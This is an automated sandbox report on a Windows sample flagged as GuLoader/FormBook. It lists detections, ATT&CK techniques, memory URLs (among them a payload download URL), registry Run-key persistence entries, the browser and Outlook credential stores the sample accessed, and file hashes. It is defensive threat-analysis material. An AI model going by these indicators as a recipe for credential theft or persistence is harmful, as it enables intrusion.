        Source: Yara match File source: Process Memory Space: wscript.exe PID: 380, type: MEMORYSTR
        Yara detected FormBook
        GuLoader behavior detected
        Source: Initial file Signature Results: GuLoader behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

        Remote Access Functionality:

        Yara detected FormBook

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Shared Modules 1 | Registry Run Keys / Startup Folder 1 | Process Injection 712 | Virtualization/Sandbox Evasion 22 | OS Credential Dumping 1 | Security Software Discovery 321 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution 1 | DLL Side-Loading 1 | Registry Run Keys / Startup Folder 1 | Process Injection 712 | LSASS Memory | Virtualization/Sandbox Evasion 22 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | System Network Connections Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 15 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | System Network Configuration Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion 1 | DCSync | System Information Discovery 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

        Behavior Graph

        [Behavior graph figure: ID 530346, Sample: BL_CI_PL.exe, Startdate: 29/11/2021, Architecture: WINDOWS, Score: 100]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        BL_CI_PL.exe | 20% | Virustotal |
        BL_CI_PL.exe | 11% | Metadefender |
        BL_CI_PL.exe | 9% | ReversingLabs | Win32.Downloader.GuLoader

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe | 11% | Metadefender |
        C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe | 9% | ReversingLabs | Win32.Downloader.GuLoader

        Unpacked PE Files

        Source | Detection | Scanner | Label
        24.0.firefox.exe.2232796c.1.unpack | 100% | Avira | TR/Dropper.Gen
        24.2.firefox.exe.2232796c.0.unpack | 100% | Avira | TR/Dropper.Gen
        29.2.wscript.exe.4f3796c.4.unpack | 100% | Avira | TR/Dropper.Gen
        14.2.ipconfig.exe.3f3796c.4.unpack | 100% | Avira | TR/Dropper.Gen
        14.2.ipconfig.exe.3591ee8.1.unpack | 100% | Avira | TR/Dropper.Gen
        29.2.wscript.exe.2ac9e48.1.unpack | 100% | Avira | TR/Dropper.Gen
        28.2.NETSTAT.EXE.2ed2880.1.unpack | 100% | Avira | TR/Dropper.Gen
        28.2.NETSTAT.EXE.387796c.4.unpack | 100% | Avira | TR/Dropper.Gen
        24.0.firefox.exe.2232796c.0.unpack | 100% | Avira | TR/Dropper.Gen

        Domains

        Source | Detection | Scanner | Label
        www.lopsrental.lease | 3% | Virustotal |
        www.yghdlhax.xyz | 0% | Virustotal |

        URLs


        Domains and IPs

        Contacted Domains


        Contacted URLs


        URLs from Memory and Binaries

                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://bgreenidaho.com/Newfile/bin_UFDek247.bin9k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://bgreenidaho.com/%BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://bgreenidaho.com/Newfile/bin_UFDek247.bin=BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://word.office.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://bgreenidaho.com/UBL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://aka.ms/odirmCHITECTexplorer.exe, 0000000D.00000000.25923523579.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25879506622.0000000009CA3000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26091037711.0000000009CA3000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://zz.bdstatic.com/linksubmit/push.jsfirefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://powerpoint.office.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.foreca.comexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://outlook.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.msn.com/?ocid=iehpexplorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bgreenidaho.com/Newfile/bin_UFDek247.binnk4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?9zexplorer.exe, 0000000D.00000000.26092066193.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25880373796.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25976374515.0000000009D81000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25924643006.0000000009D81000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.hostgator.com.bripconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://api.msn.com:443/v1/news/Feed/Windows?Uexplorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://api.msn.com/explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.comipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://bgreenidaho.com/k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmptrue
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://windows.msn.com:443/shellexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://excel.offiexplorer.exe, 0000000D.00000000.25925791152.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26093468212.0000000009E62000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25881260799.0000000009E62000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://bgreenidaho.com/Newfile/bin_UFDek247.binuBL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown

Contacted IPs


Public


                                                                                                                                                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 530346
Start date: 29.11.2021
Start time: 14:02:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 19m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: BL_CI_PL.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@31/7@62/20
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 190
• Number of non-executed functions: 126
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.54.122.82
                                                                                                                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, client.wns.windows.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

Time | Type | Description
14:09:48 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 3F1XN2EXMJF C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
14:11:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCN C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
14:11:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FBF8U8LXCN C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                    Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                    ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                    • 23.27.137.70
                                                                                                                                                    jydygx.arm7Get hashmaliciousBrowse
                                                                                                                                                    • 107.165.18.79
                                                                                                                                                    202111161629639000582.exeGet hashmaliciousBrowse
                                                                                                                                                    • 166.88.19.181
                                                                                                                                                    w8aattzDPjGet hashmaliciousBrowse
                                                                                                                                                    • 172.121.95.168
                                                                                                                                                    XxMcevQr2ZGet hashmaliciousBrowse
                                                                                                                                                    • 172.120.108.136
                                                                                                                                                    sora.armGet hashmaliciousBrowse
                                                                                                                                                    • 136.0.238.242
                                                                                                                                                    x3mKjigp7jGet hashmaliciousBrowse
                                                                                                                                                    • 216.172.145.226
                                                                                                                                                    588885.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 107.187.86.150

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DB1
                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.8384034474405602
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:13WB14fxcKzsIYICVEq8MX0D0HSFlNUK6lGNxGt7KLk8s8LKvUf9KVyJ7hU:J2CdCn8MZyFlulGNxGt7KLyeymw
                                                                                                                                                    MD5:3486408AF6E5BFDBE15DEDDEFB834576
                                                                                                                                                    SHA1:8118E27D74977C176BD305862105CE5F22AE10D8
                                                                                                                                                    SHA-256:5B26EE9B1FF774148D102BD7594D4B31C4B004D05C42F72EF82B1C90362B2196
                                                                                                                                                    SHA-512:E2F45693DDBE1A42C6855439A394E1C00AE8EC81FDC4B8F1BC6EC37E93AE9389D0E0CCC3C4419572DD09371590384E859324F163BDFD462C2B1D4FF7F7ED1E73
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):143360
                                                                                                                                                    Entropy (8bit):6.015718830852235
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Ee3Ennt9/+Ij6lRR8TLCEUOy+aIGlmkf7qsdTeca/6AJqSkORq+VGoOvZr8ziyNB:xEztQG/pajY67qqKRkFOw+U5m/SQ
                                                                                                                                                    MD5:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    SHA1:96DA47F0E279F810714AFDC362C15F2E0EAE6DD7
                                                                                                                                                    SHA-256:02854EF9C13129F6336DB1B1D33B5255A88A5657B5E66EBDA12B733A2C421FF7
                                                                                                                                                    SHA-512:B51BD3700E6959D56DBF5B1BD0CC0CF3E9DCCFC664630C69536F5492D21D67D4054B24003D7918E75811A108DFA104DE04252A3BF3B1849B3B5BDB9BA9003A35
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 11%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0A1C6DEBC6BEE485.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0C461363B08A4B7D.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF3A772AC6F37DE022.TMP
                                                                                                                                                    Process:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF94D0DD0995ECDEC7.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFA0B02BA84DC15ADD.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):6.015718830852235
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:BL_CI_PL.exe
                                                                                                                                                    File size:143360
                                                                                                                                                    MD5:75a9a6347c5ae5d8bd464c195b9802bb
                                                                                                                                                    SHA1:96da47f0e279f810714afdc362c15f2e0eae6dd7
                                                                                                                                                    SHA256:02854ef9c13129f6336db1b1d33b5255a88a5657b5e66ebda12b733a2c421ff7
                                                                                                                                                    SHA512:b51bd3700e6959d56dbf5b1bd0cc0cf3e9dccfc664630c69536f5492d21d67d4054b24003d7918e75811a108dfa104de04252a3bf3b1849b3b5bdb9ba9003a35
                                                                                                                                                    SSDEEP:1536:Ee3Ennt9/+Ij6lRR8TLCEUOy+aIGlmkf7qsdTeca/6AJqSkORq+VGoOvZr8ziyNB:xEztQG/pajY67qqKRkFOw+U5m/SQ
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......Q.....................0....................@

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:28f0da9af0f0f034

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x4016a4
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                    DLL Characteristics:
                                                                                                                                                    Time Stamp:0x518DF11A [Sat May 11 07:19:54 2013 UTC]
